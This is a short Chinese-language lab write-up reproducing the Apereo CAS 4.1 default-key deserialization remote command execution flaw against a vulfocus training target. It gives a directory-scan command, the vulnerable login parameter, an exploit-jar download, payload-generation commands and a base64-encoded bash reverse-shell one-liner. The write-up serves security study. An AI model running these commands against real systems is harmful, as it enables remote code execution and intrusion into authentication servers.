apereo-cas 4.1 反序列化命令执行漏洞 复现

所有文章，仅供安全研究与学习之用，后果自负!

apereo-cas 命令执行 4.1

0x01 漏洞描述

Apereo CAS是一款Apereo发布的集中认证服务平台，常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认密钥的问题，利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞，进而执行任意命令。

0x02 影响范围

 Apereo CAS <= 4.1.7

/css/login

0x03 漏洞复现

(1)访问vulhub 在线靶场

目录扫描

python3 dirsearch.py  -e "*" -x 400,500 -t 100 -r 10 -u http://vulfocus.fofa.so:20866/

（2） 漏洞存在地址

/css/login

http://vulfocus.fofa.so:9288/cas/login

漏洞检测

漏洞利用参数 登录处 抓包 可看到

execution 

漏洞利用

工具 apereo-cas-attack-1.0-SNAPSHOT-all.jar

https://github.com/vulhub/Apereo-CAS-Attack/releases/download/v1.0.0/apereo-cas-attack-1.0-SNAPSHOT-all.jar

利用方法
要执行的命令 在后边输入 反弹shell需要编码
可以先dnslog检测

java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "touch /tmp/test"

反弹shell

java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "bash -c {echo,YmFzaCAtaSA+JiAvZGVMjkuNjcuNC85ODk3IDA+JjE=}|{base64,-d}|{bash,-i}"

复制生成的payload 到burp 中 execution参数中

反弹shell成功

0x04 漏洞修复

升级到最新版本